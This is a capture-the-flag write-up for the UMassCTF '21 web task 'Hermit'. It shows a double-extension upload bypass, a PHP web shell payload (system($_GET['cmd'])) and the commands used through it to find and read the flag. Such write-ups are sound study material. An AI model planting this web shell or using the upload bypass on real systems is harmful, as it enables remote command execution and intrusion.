UMassCTF '21 Writeup - Hermit

UMassCTF Hermit is an easy web CTF task. Reading the description, we get an ip to connect to.

This is what the website looks like:

There are a few things i've noticed right away. The first one being that we have to somehow upload a file, which will create a shell to the server or something similiar. But the problem is that you can only upload images. Last but not least, when i test uploaded an image, i noticed the website is written using PHP.

Since i haven't done such a ctf task before, i began my research.

My guess was to trick the uploader into giving it an image, but it's actually a php file which will somehow get executed. Actually this is quite possible, if this site is only checking the last file extension.

So i created a file 'shell.php'. This file only contains an echo function to proof that it is being executed.

If you're using linux, you can use the move command to change this file into a "jpg" file by typing

mv shell.php shell.php.jpg

See what we did there? Since it can't convert the file itself, it just appends the jpeg file extension.

Let's upload this image.

It got successfully uploaded and we can take a look at this image.

EXECUTED!

Quick recap. We bypassed the file extension "checker" and successfully executed shell.php.

What to do now ..? Exploit!

Exploit

I've created another shell.php, but this time the content is malicous.

In order to access the filesystem of this server, we have to somehow execute commands remotely.

One way is by using PHP's system() function.

What is this function going to do?

system() is just like the C version of the function in that it executes the given command and outputs the result.

Great! So our payload will look as follows:

<?php

    system($_GET['cmd'])

?>

Pretty simple right? So what is going on?

We know system() is executing any given command and outputs the result. By using $_GET we create a GET request parameter for this website. When calling this GET parameter with our desired command, it should output its content right to the website.

And what command do we want to execute?

Well, there are many commands we could execute in order to achieve our goal (getting the flag).

Tell us how you got that flag!

Okay. Let's get back to the frontpage of this site and upload our newly created exploit. (don't forget to convert to an image before!)

When successfully uploaded, navigating to the newly created url will print an error, since we didn't applied any command in our parameter.

Since we don't know where the flag file is, we somehow have to search for it.

To get the flag we have to extend our current url by simply adding

&cmd=find / -name '*flag.txt'

This outputs: "/home/hermit/flag.txt /home/hermit/flag/userflag.txt"

Now the last step is to cat out the flag.

&cmd=cat /home/hermit/userflag.txt

and we got the flag!

UMASS{a_picture_paints_a_thousand_shells}